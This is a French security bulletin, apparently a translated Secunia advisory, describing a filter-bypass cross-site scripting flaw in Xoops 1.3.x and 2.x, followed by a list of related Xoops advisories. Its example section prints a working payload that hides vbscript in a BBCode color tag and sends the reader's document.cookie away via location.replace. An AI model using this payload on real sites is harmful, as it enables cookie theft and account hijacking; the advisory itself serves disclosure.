Sécurité informatique

SECURINFOS.INFO - Bulletins de sécurité informatique, Alertes et Protection

Xoops Cross Site Scripting

21/01/2007 14H18
Référence Secunia : SA9528
Date de publication : 2003-08-14

Risque : Non Critique. Niveau 2 sur 5.
Impact : Cross Site Scripting
Lieu : A distance

Solutions :
Correctif de l'éditeur

Produit :
Xoops 1.3.x
Xoops 2.x

Description :
Une vulnérabilité a été rapportée dans Xoops autorisant les utilisateurs malicieux à injecter scripts.

Le problème est que le filter peut être contournée en remplaçant caractères avec leurs ASCII values. Cela permet à des utilisateurs malicieux pour injecter vbscript dans des messages privés, news et potentiellement d'autres functions.

Exemple :
[color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

Versions 1.3 et plus loin a été rapportée vulnérable.

Solutions :
La version 2.0.3 n'est pas vulnérable.

Vulnérabilité découverte par :

Frog Man

Veuillez noter : L'information sur laquelle ce bulletin de sécurité Secunia est basé provient d'un tiers sans mention du contraire.

Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs.

Derniers bulletins de sécurité informatique

Bulletins de sécurité informatiques relatifs

20080429 XOOPS Various Bluemoon inc Modules Cross Site Scripting

20080313 XOOPS Tutorials Module tid Injection SQL

20080225 Xoops XM Memberstats Module letter et sortby Injection SQL

20080222 XOOPS Tiny Event Module id Injection SQL

20080222 XOOPS Prayer List Module cid Injection SQL

20070614 Xoops XT Conteudo Module spaw root Inclusion de Fichiers

20070614 Xoops Cjay Content WYSIWYG IE Module spaw root Inclusion de Fichiers

20070613 Xoops Tiny Content Module spaw root Inclusion de Fichiers

20070613 Xoops Horoscope Module xoopsConfig root path Inclusion de Fichiers

20070516 Xoops Resmanager Module id reserv Injection SQL

20070507 XOOPS Flashgames Module lid Injection SQL

20070406 XOOPS WF Links Module cid Injection SQL

20070406 XOOPS Jobs Module cid Injection SQL

20070405 Xoops WF Snippets Module c Injection SQL

20070405 Xoops Rha7 Downloads Module lid Injection SQL

20070403 Xoops Kshop Module id Injection SQL

20070403 Xoops Camportail Module camid Injection SQL

20070402 Xoops RMSoft Gallery System Module idcat Injection SQL

20070328 Xoops Articles Module id Parameter Injection SQL

20060830 Xoops user avatar Parameter Vulnérabilité d'Injection SQL

20060629 Xoops MyAds Module lid Parameter Vulnérabilité d'Injection SQL

20060522 Xoops Vulnérabilités d'Inclusion de Fichiers Locaux

20051115 Xoops WF Downloads Vulnérabilité d'Injection SQL

20051115 Xoops Vulnérabilité d'Inclusion de Fichier Local

20051025 Xoops Vulnérabilités d'Insertion de Script

20050809 XOOPS Vulnérabilités PHPMailer et XML RPC

20050809 XOOPS PHPMailer et XML RPC Vulnérabilités

20050630 crip Création Non Sécurisée de Fichiers Temporaires

20050630 Xoops Cross Site Scripting et Injection SQL

20050309 Xoops Avatar Upload File Extension Vulnérabilité

20050131 Xoops Incontent Module Arbitrary Divulgation de Contenu de Fichier

20040901 XOOPS Dictionary Vulnérabilité Cross Site Scripting

20031231 Site Sift Listings id Injection SQL

20031222 Xoops URL Parameter Cross Site Scripting Vulnérabilité

20031208 Xoops Injection SQL et Banner Manipulation Vulnérabilités

20030814 Xoops Cross Site Scripting

20030618 Xoops Tutorials execution de code arbitraire

20030428 XOOPS MyTextSanitizer Cross Site Scripting

20030403 XOOPS Glossary Module Cross Site Scripting

20030320 XOOPS xoopsOption Path Disclosure Faille

20021216 XOOPS Private Message Disclosure Vulnérabilité

20020924 Xoops vulnérabilité injection de script

20020924 Xoops PHP Nuke NPDS daCode Drupal et phpWebSite Cross Site Scripting

Securite informatique

JA-PSI - Sécurité informatique - Tous droits réservés

formation sécurité informatiqe